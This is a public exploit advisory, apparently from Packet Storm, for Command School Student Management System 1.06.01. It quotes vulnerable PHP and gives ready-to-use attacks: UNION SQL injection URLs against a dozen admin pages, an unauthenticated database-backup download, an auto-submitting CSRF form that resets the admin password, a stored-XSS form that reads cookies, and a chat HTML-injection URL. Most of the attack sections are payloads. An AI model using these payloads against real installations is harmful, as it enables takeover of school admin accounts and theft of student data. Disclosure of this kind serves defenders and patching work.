Command School Student Management System version 1.06.01 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.
f21fadfba66ed93c307bc2f7a2247cee0d8a016bcb82c7f40566e62dc5b4bc10Command School Student Management System V1.06.01 - Multiple Vulnerabilties
============================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/swifttide/
####################################################################
I. Multiple Sql Injection
##############
VULNERABILITY
##############
/admin_school_names.php
-----------------------------------------------------------------------------
line (27): $action=get_param("action");
line (54-56)
case "edit":
$school_names_id=get_param("id");
$sSQL="SELECT school_names_desc FROM school_names WHERE
school_names_id=$school_names_id";
note:[all Files same error]
-----------------------------------------------------------------------------
#########
EXPLOIT
#########
localhost/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
localhost/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()
II. Backup Download
##############
VULNERABILITY
##############
/Backup/backup_ray2.php (LINE: 78-126)
-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");
// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}
// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{
// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");
// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");
// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{
// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
<html>
<title>Iphobos Blog</title>
<label><a href="http://localhost/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>
III. Cross Site Request Forgery
[Change Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://localhost/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>
IV. Cross Site Scripting
[CSRF with XSS Exploit]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>
V. Html File Injection
##############
VULNERABILITY
##############
/chat/message.php (LINE: 4-12)
-----------------------------------------------------------------------------
$f = fopen('msg.html',"a+");
} else {
$f = fopen('msg.html',"w+");
}
$nick = isset($_GET['nick']) ? $_GET['nick'] : "Hidden";
$msg = isset($_GET['msg']) ? htmlspecialchars($_GET['msg']) : ".";
$line = "<p><span class=\"name\">$nick: </span><span
class=\"txt\">$msg</span></p>";
fwrite($f,$line."\r\n");
fclose($f);
-----------------------------------------------------------------------------
#########
EXPLOIT
#########
localhost/sw/chat/message.php?line=&nick=IPHOBOS&msg=BLOG
After Exploit Go To localhost/sw/chat/msg.html
you will find the injection information
####################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed